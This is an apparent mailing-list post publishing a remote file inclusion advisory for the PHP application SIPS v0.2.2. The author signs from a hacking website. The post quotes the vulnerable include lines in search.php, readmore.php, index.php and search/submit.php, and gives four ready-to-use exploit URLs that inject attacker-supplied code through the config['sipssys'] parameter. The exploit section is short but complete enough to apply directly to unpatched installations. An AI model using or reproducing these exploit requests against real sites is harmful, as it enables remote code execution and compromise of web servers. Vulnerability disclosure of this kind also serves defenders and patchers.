[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SIPS v0.2.2 Remote File Inclusion Vulnerability



Hi Dear,
Please publish this bug.
Thank you
/===============================================================================================================================================\
  |																								  |
  |  [o] SIPS v0.2.2 Remote File Inclusion Vulnerability								     	  |
  |																								  |
  |       Software : SIPS v0.2.2														     	  |
  |       Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip			          |
  |       Author   : Cru3l.b0y													        		  |							     				  |
  |		  Home     : WwW.DeltaHacking.Net 					
  |===============================================================================================================================================|
  |																								  |
  |  [o] Vulnerable file																		  |
  |																		  						  |
  |       search.php								                  					          |
  |																		  						  |
  |        include $config["sipssys"] ."/code/news.inc.php";                           		      |	
  |                                                                                               |
  |       readmore.php                                                                            |
  |                                                                                               |
  |		   include $config["sipssys"] ."/code/news.inc.php";                                      |
  |		                                                                                          |
  |		  index.php                                                                               |
  |		                                                                                          |
  |		   include $config["sipssys"] ."/code/news.inc.php";                                      |
  |        include $config["sipssys"] ."/code/box.inc.php";                                       |
  |		                                                                                          |
  |	      search/submit.php                                                                       |
  |		                                                                                          |
  |		   include $config["sipssys"] ."/code/search.inc.php";                                    |
  |																		  						  |
  |																		  						  |
  |																		    					  |
  |  [o] Exploit														  						  |
  |																		   						  |
  |       http://localhost/[path]/search.php?config["sipssys"]=[evilcode]                         |
  |       http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]                       |
  |       http://localhost/[path]/index.php?config["sipssys"]=[evilcode]                          |
  |       http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]                  |
  |																		  						  |